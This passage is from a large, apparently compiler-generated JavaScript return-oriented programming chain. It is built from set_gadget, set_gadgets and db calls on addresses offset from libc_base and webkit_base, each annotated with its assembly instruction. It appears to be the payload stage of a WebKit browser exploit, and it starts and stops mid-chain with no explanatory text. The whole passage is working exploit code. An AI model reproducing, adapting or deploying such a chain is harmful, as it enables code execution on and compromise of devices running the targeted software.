libc_base+763368 //pop rcx ]); //L10598: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+548864, //L10599 //L8486: libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10600: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10602: db([4294967220, 4294967295]); // -0x4c set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+488832, //L10604 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10603: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L10604: db([0, 0]); // 0x0 set_gadgets([ webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L10606: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+488968, //L10609 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+488952, //L10607 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10607: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10609: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+489144, //L10612 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+489160, //L10613 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+489112, //L10610 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+489128, //L10611 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10610: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10611: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10612: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10613: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+489256, //L10615 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+489240, //L10614 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10614: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L10615: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L10616: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L10617: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L10618: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+489456, //L10620 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10620: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+489512, //L10621 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10621: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+489648, //L10625 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+489632, //L10624 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10623: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L10624: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10625: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+489768, //L10628 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+489736, //L10626 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10626: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10627: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10628: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+489904, //L10630 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+489920, //L10631 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+489888, //L10629 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L10629: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10630: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10631: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+490032, //L10633 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+490080, //L10636 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+490048, //L10634 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L10633: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10634: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10635: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10636: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+490192, //L10637+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, 
[rax] libc_base+764760, //pop rsi ropchain+490184, //L10637 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L10637: db([0, 0]); // 0x0 set_gadgets([ ropchain+490208, //L10637+24 ropchain+494232, //L10632 //L10638: libc_base+764760, //pop rsi ropchain+490248, //L10639 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10639: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10641: db([4294967220, 4294967295]); // -0x4c set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+490368, //L10644 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+490352, //L10642 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10642: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10644: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+490544, //L10647 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+490560, //L10648 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+490512, //L10645 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+490528, //L10646 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10645: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10646: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10647: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10648: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+490656, //L10650 webkit_base+660161, //mov [rsi], rax 
; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+490640, //L10649 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10649: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10650: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+490744, //L10652 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L10651: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L10652: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+490800, //L10653 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10653: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10655: db([4294967220, 4294967295]); // -0x4c set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+490880, //L10657 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10657: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+491016, //L10660 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+491000, //L10659 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10658: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L10659: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10660: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl 
libc_base+764760, //pop rsi ropchain+491120, //L10662 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+491104, //L10661 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10661: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10662: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+491200, //L10663 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10663: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10665: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+491320, //L10668 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+491304, //L10666 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10666: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10668: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+491496, //L10671 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+491512, //L10672 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+491464, //L10669 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+491480, //L10670 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10669: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10670: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi 
//L10671: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10672: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+491672, //L10676 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+491640, //L10674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+491656, //L10675 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10673: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L10674: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10675: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10676: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+491760, //L10677 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+491776, //L10678 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10677: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10678: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+491952, //L10680 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+491968, //L10681 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+491936, //L10679 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L10679: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L10680: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10681: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+492080, //L10683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+492128, //L10686 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+492096, //L10684 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L10683: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10684: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10685: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10686: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+492240, //L10687+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+492232, //L10687 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L10687: db([0, 0]); // 0x0 set_gadgets([ ropchain+492256, //L10687+24 ropchain+494200, //L10682 libc_base+764760, //pop rsi ropchain+492296, //L10688 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10688: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10690: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+492416, //L10693 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+492400, //L10691 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10691: 
db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10693: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+492560, //L10696 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+492528, //L10694 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+492544, //L10695 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10694: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10695: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10696: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+492640, //L10697 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10697: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10699: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+492760, //L10702 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+492744, //L10700 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10700: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10702: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+492904, //L10705 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+492872, //L10703 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+492888, //L10704 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10703: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10704: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10705: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+492992, //L10707 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L10706: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L10707: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+493048, //L10708 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10708: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10710: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+493128, //L10712 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10712: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+493240, //L10713 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10713: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10715: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+493360, //L10718 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, 
//mov rax, rdi libc_base+764760, //pop rsi ropchain+493344, //L10716 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10716: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10718: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+493504, //L10721 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+493472, //L10719 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+493488, //L10720 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10719: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10720: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10721: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+493584, //L10722 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L10722: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10723: db([32, 0]); // 0x20 set_gadget(libc_base+144605,); //pop rdi //L10724: db([32, 0]); // 0x20 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+493712, //L10726 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+493696, //L10725 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10725: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10726: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax 
libc_base+764760, //pop rsi ropchain+493792, //L10727 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10727: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10729: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+493912, //L10732 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+493896, //L10730 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10730: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10732: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+493992, //L10734 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+494024, //L10736 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10734: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L10735: ropchain+494152, //L10733 libc_base+144605 //pop rdi ]); //L10736: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+494128, //L10738 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+494144, //L10737 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L10738: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L10737: db([0, 0]); // 0x0 //L10733: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+494216, //L10739 //L10682: libc_base+782311, 
//pop rsp ropchain+494232, //L10740 //L10739: libc_base+782311, //pop rsp ropchain+490208, //L10638 //L10740: //L10632: libc_base+764760, //pop rsi ropchain+494272, //L10741 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10741: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10743: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+494392, //L10746 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+494376, //L10744 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10744: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10746: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+494536, //L10749 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+494504, //L10747 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+494520, //L10748 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10747: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10748: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10749: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+494616, //L10750 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10750: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10752: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+494736, 
